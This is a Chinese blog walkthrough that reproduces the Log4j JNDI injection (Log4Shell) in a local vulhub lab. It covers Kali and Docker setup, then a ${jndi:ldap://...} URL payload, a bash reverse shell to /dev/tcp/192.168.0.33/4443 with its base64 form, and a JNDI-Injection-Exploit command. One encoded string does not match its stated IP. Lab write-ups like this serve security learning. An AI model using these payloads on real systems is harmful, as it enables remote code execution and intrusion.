log4j反序列化

最新推荐文章于 2024-07-08 20:50:13 发布
最新推荐文章于 2024-07-08 20:50:13 发布
阅读量1.1k 收藏 25
点赞数 47
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71604403/article/details/137272768
版权

1.环境搭建

一台kali(靶机)
一台win(攻击机)

这里kali进行换源

# 官方源
# deb http://http.kali.org/kali kali-rolling main non-free contrib
# deb-src http://http.kali.org/kali kali-rolling main non-free contrib
#根据需要自己选一个,中科大的还可以
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云
#deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#清华大学
#deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#浙大
#deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
#deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
#东软大学
#deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
#deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
#重庆大学
#deb http://http.kali.org/kali kali-rolling main non-free contrib
#deb-src http://http.kali.org/kali kali-rolling main non-free contrib

 进入/etc/apt目录
编辑sources.list文件命令如下

sudo vim sources.list

 将原有的源注释,添加其他源,这里用的是阿里的

 随后进行更新

apt-get update 更新索引

apt-get upgrade 更新软件

apt-get dist-upgrade 升级

apt-get clean 删除缓存包

apt-get autoclean 删除未安装的deb包
普通用户记得在命令前接上sudo

kali机安装docker命令如下

 sudo apt install docker.io
root用户不用加sudo

 安装docker-compose

sudo apt-get install docker-compose

安装靶场vulhub

git clone https://github.com/vulhub/vulhub.git

 启动靶场环境

进入靶场
cd /vulhub/log4j/你所想打的对应版本
启动
docker-compose up -d
查看容器开放端口
docker ps
访问靶场,ip加端口访问

 漏洞复现

 将以下代码放入url

admin/cores?action=${jndi:ldap://uhd50l.dnslog.cn}

下载工具
JNDI-Injection-Exploit

 Release JNDI-Injection-Exploit v1.0 · welk1n/JNDI-Injection-Exploit · GitHub

 构建反弹shell要经过base64编码

原码
bash -i >& /dev/tcp/192.168.0.33/4443 0>&1
编码后
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMzkvNDQ0MyAwPiYx

利用JNDI-Injection-Exploit v1.0生成payload

 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMzMvNDQ0MyAwPiYx}|{base64,-d}|{bash,-
i}" -A 192.168.0.33

 

 发包

台球小王子
关注
  • 47
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java之log4j反序列化
weixin_45653478的博客
07-20 1167
Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议即可),并会通过名称从ldap服务端获取对应的Class文件,使用ClassLoader在本地加载Ldap服务端返回的Class类。
log4j2反序列化
weixin_62688091的博客
04-13 132
程序日志监控组件,被应用在了各种各样的衍生框架中,同时也是作为目前。全生态中的基础组件之一,这类组件一旦崩塌将造成不可估量的影响。log4j2主要的一点是它的payload:jndi:rmi///xxx,有回显存在log4j2的java反序列的日志漏洞。log4j2作为一个优秀的。
谈谈log4j反序列化
一个安全研究员
02-17 1303
文章发布在安全客:https://www.anquanke.com/post/id/195932
(七)vulhub专栏:Log4j 反序列化、远程代码执行漏洞复现
云舒的博客
07-21 988
log4j 反序列化、远程代码执行漏洞
log4j反序列化远程命令执行以及个人原理理解
weixin_46626737的博客
08-11 318
目录服务是一个特殊的数据库,用来保存描述性的、基于属性的详细信息,支持过滤功能。${jndi:ldap:x.x.x.x/test.class},通过构造的这条恶意函数,发送到log4j,打印到日志中,开始解析{}中的内容,发现是ldap实现的jndi,然后调用lookup。功能去查找x.x.x.x/test.class该文件,然后发现是远程服务器的文件,需要通过codebase去下载该class类,然后下载后,对该class文件进行使用默认的构造器。类似于上一个漏洞的原理。
Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)
最新发布
m0_68045701的博客
07-08 511
网络隔离:如果立即升级不可行,应将受影响的服务器与其他网络隔离,以减少攻击面。输入过滤:对于无法升级的环境,可以考虑实现自定义的输入过滤机制,以防止恶意的序列化数据被处理。监控日志:密切关注日志系统,寻找任何异常的日志事件或未经授权的访问尝试,并及时响应。Apache Log4j是一个广泛使用的Java日志记录库,它通过提供灵活的日志记录级别、日志格式和日志目的地等功能,成为了许多开发者和组织的首选日志工具。下载后打包成jar文件进行使用,也可以直接下载jar包,在该网址的下面,往下拉就可以看到了。
【Apache Log4j Server 反序列化命令执行漏洞】
qq_61947585的博客
07-06 332
Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。
【漏洞复现】Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
过期的秋刀鱼
11-04 863
ysoserial是在常见的java库中发现的一组实用程序和面向属性的编程“小工具链”,在适当的条件下,可以利用执行对象不安全反序列化的Java应用程序。主驱动程序接受用户指定的命令,并将其封装在用户指定的小工具链中,然后将这些对象序列化为stdout。当类路径上具有所需小工具的应用程序不安全地反序列化该数据时,将自动调用该链并导致在应用程序主机上执行该命令。攻击者可以通过发送一个特别制作的2进制payload,在组件将字节反序列化为对象时,触发并执行构造的payload代码。将反弹shell进行。
Log4j2 反序列化漏洞原理与复现
FisrtBqy的博客
05-15 4084
Log4j2 RCE漏洞原理与复现
Apache Log4j反序列化命令执行漏洞
01-10
vulhub靶机里的这个漏洞里缺少了curl或者wget这些命令
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中...
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效
06-07
对于Fastjson,需要注意其反序列化过程中的安全问题,因为恶意构造的JSON数据可能导致代码执行或信息泄露。 在使用这个BurpSuite插件时,可以先对目标应用进行常规扫描,然后通过插件深度分析日志记录和JSON处理...
java反序列化验证工具
02-25
可以对Java反序列化漏洞进行验证,是针对weblogic中间件的很好用的工具。
FastjsonScan:一个简单的Fastjson反序列化检测burp插件
04-13
FastjsonScan一个简单的Fastjson反序列化检测burp插件我在挖洞的时候看到一些json请求总是想要检测一下有没有Fastjson反序列化问题,本可以直接写一个脚本来跑或者搭配其他被动扫描器来验证,但是我太懒了,先不说...
C3P0 fastjson log4j POI3.7+3.8 jar包资源
02-22
2. **FastJSON**:FastJSON是阿里巴巴开发的一个高性能的JSON库,用于JSON序列化和反序列化。`fastjson1.2.2.jar`这个版本包含了解析JSON字符串到Java对象,以及将Java对象转换为JSON字符串的功能。FastJSON支持Java...
Hibernate4+SpringMVC+Junit4+log4j环境搭建Jar包
02-06
在实际开发中,你还需要根据项目具体需求选择合适的数据库驱动包,以及可能用到的其他第三方库,如Jackson(用于JSON序列化和反序列化)。通过合理地集成这些组件,你可以构建出一个高效、可维护的Java Web开发环境...
16、MapReduce的基本用法示例-自定义序列化、排序、分区、分组和topN
05-29
在本例中,使用了log4j进行日志管理,配置文件log4j.properties定义了日志级别、输出位置和格式,帮助开发者跟踪程序执行情况和错误。 总结,MapReduce提供了强大的工具来处理大规模数据,包括自定义序列化以适应...
logback + slf4j web项目源码
02-08
**标题解析:** "Logback + SLF4J Web项目源码" 提示我们这是一个基于Logback和SLF4J...通过研究这个源码,开发者可以学习到如何在实际项目中有效地使用Logback和SLF4J,以及如何进行数据序列化和反序列化的实践技巧。
log4j2是不是java的反序列化漏洞
05-17
是的,log4j2存在Java反序列化漏洞。具体来说,该漏洞存在于log4j-core模块中的JMS Appender组件中,攻击者可以利用该漏洞通过特制的JMS消息触发反序列化漏洞,从而在受影响的应用程序上执行恶意代码。该漏洞已经被公开披露并得到了广泛的关注,建议开发者尽快升级到最新版本或采取其他相应的安全措施来保护应用程序的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值